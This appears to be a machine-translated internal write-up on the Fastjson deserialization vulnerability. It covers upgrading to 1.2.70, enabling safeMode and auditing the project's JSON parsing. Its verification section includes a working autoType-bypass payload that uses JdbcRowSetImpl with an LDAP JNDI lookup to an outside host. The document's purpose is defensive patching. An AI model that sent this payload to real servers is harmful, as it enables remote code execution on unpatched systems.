[toc]

Article source: Linwindow Xuanmo blog

aboutFastJsonUpgrade to the1.2.70instructions

author: Vic.xu

Date:20200601

oneExtract from official Notice 20200601

Safety Bulletin 20200601

Recently, Ali Cloud emergency response Center detected the outbreak of a new deserialization remote code execution vulnerability in Fastjson. Hackers can bypass the autoType limit by using the vulnerability and directly execute arbitrary commands remotely to attack the server, which is extremely risky.

Vulnerability describes

Fastjson uses a blacklist and whitelist approach to defend against deserialization vulnerabilities. As a result, while hackers are constantly discovering new deserialization Gadgets classes, it is possible to bypass the blacklist and whitelist defense mechanism even with autoType turned off, creating remote command execution vulnerabilities. According to the study, this vulnerability has a low utilization threshold and can bypass the autoType restriction with a large risk impact. Aliyun emergency Response Center reminded Fastjson users to take security measures to prevent vulnerability attacks as soon as possible.

Affects version

  • Fastjson < = 1.2.68
  • Fastjson SEC version <= sec9

Upgrade package

Upgrade to latest version 1.2.69 or later version 1.2.70.

Fastjson reinforcement

Fastjson introduced safeMode in 1.2.68 and later versions. SafeMode does not support autoType in both whitelists and blacklists, which mitigates deserialization of bugs.

SafeMode open method

  1. Configure in code

    ParserConfig.getGlobalInstance().setSafeMode(true);

  2. Plus JVM startup parameters

    -Dfastjson.parser.safeMode=true

  3. Through the fastjson.properties file.

    fastjson.parser.safeMode=true

Vulnerability principle and vulnerability verification

Multiple versions of Fastjson components cause code execution when deserializing untrusted data. First, Fastjson provides autoType, which allows users to specify the type of deserialization in the deserialization data by “@type”. Second, Fastjson’s custom deserialization mechanism calls setter methods and some getters in the specified class. When autoType is enabled and untrusted data is deserialized, an attacker can construct data that causes the code execution flow of the target application to enter a particular setter or getter method of a particular class. If the specified method of the specified class has logic that can be exploited maliciously (commonly referred to as a “Gadget”), Can cause some serious security problems.

In Fastjson 1.2.47 and below version, use the cache mechanism can be realized in bypass, not open autotype function to bypass the details refer to (www.anquanke.com/post/id/181…

A simple display of the vulnerability code

Based on version 1.2.46 currently used by ICBC

  1. The autoType option is disabled by default in fastjson 1.2.2+.

    ParserConfig config = ParserConfig.getGlobalInstance();
    boolean autoTypeSupport = config.isAutoTypeSupport();
    System.out.println(autoTypeSupport);//false
    Copy the code
  2. Test code not bypassed when autoType is false under normal conditions

    Model model = new Model();
    model.setId(1);
    model.setName("vic");
    / / the results obtained for {@ "type" : "pers. Vic. Test. Json. Fastjson. Model", "id" : 1, "name" : "vic"}
    String json  = JSON.toJSONString(model, SerializerFeature.WriteClassName);
    System.out.println(json);
    / / error: exchange sequence autoType is not support. Pers. Vic. Test. Json. Fastjson. Model
    JSON.parse(json);
    Copy the code
  3. Verify bypassing the blacklist andautotypeInspection process of

    • Prepare a string that can bypass detection

      private static String str = "{\"name\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"x\":{\"@type\":\"com.sun.rowset.J dbcRowSetImpl\",\"dataSourceName\":\"ldap://a.631c122b.n0p.co\",\"autoCommit\":true}}";
      Copy the code
    • Performs deserialization of the string

      JSONObject obj = JSON.parseObject(str);
      Copy the code

      An error message is displayed

      . set property error, autoCommit

      . JdbcRowSet (connection) JNDI cannot connect

    The database connection operation and setAutoCommit operation are performed. , proving that autotype is bypassed;

    The principle of bypass, refer to https://www.anquanke.com/post/id/181874; About meaning:

    1. The autotype in this project is the default configuration :false
    2. Cache common library names in the ConcurrentMap object mappings
    3. If the class name of the deserializers is not passed in when the class name of the deserializers is called, get the class name of the deserializers from the mappings or deserializers.findClass() method.
    4. After finding the corresponding class, it will return, no longer through the blacklist and autotype check process. The Java.lang. Class class happens to exist in the buckets attribute of deserializers:
    5. (2, 3 and 4 combined with the check that the blacklist and autotype have been bypassed, the subsequent explanation is omitted)

In this projectjsonInstructions for use

3.1 Json sequence conversion and deserialization are mainly used asJackson

  1. The theme framework used in this project is SpringMVC, where the transformation of JSON in the message converter is usedMappingJackson2HttpMessageConverter(i.e.Jackson)
  2. It does two things (serialization/deserialization):
    1. through@ResponseBodyAnnotations that return the contents of the response body convert the object to a JSON string (serialized); This is used heavily in this project, where the vast majority of Ajax requests go through json serialization; 2. By@RequestBodyAnnotation, receiving the JSON string from the front end and serializing the JSON string into the procedure object, was used very infrequently in this project (only one was found by searching)

3.2 aboutfastjsonFor use in this project

Only search for deserialization, because serialization is not a security issue

  1. JSON.parseA search for this item yielded 19 results
  • Most of these are strings stored by the serialization backend itself (no security risk)
  1. JSONObject.parseThe search results in this project are 2
  • Both of these are the json strings passed in by the front-end of the direct reverse sequence, which is risky

3.3 Introduction of this projectfastjsonThe reason why

My guess:

  1. Since the ORM framework in this project uses Hibernate, there is lazy loading (that is, proxy objects are queried most of the time)

  2. The common use of database entities and models results in a lot of Jackson seriality-related annotations on the entities (e.g., ignoring serialization of attributes);

    Such as:

    1. When an entity object is queried, it is returned to the front end through serialization. Because of Hibernate’s cascading query, a lot of annotations are added to ignore serialization, so as to eliminate unnecessary queries
    2. If the back end receives the front-end JSON string through the same entity object, the attributes will be lost by ignoring the serialized annotations
  3. The purpose of using FastJSON is to avoid jackson-related serialization annotations and reuse the Model

Four of thefastjsonUpgrade instructions

There is no need to use @type deserialization in this project, it can be completely disabled;

  1. Upgrade the version to 1.2.70 recommended on the official website.

    After the upgrade, when using the above string test past autoType complains: autoType is not support. Com. Sun. Rowset. JdbcRowSetImpl

  2. Set fastjson.parser.safeMode=true to disable autoType completely using the fastjson.properties configuration file.

    See instructions on the official website:

    After 1.2.68, Fastjson added safeMode support in 1.2.68. When safeMode is turned on, autoType is completely disabled. All security fixes sec10 also support SafeMode configuration.

Article source: Linwindow Xuanmo blog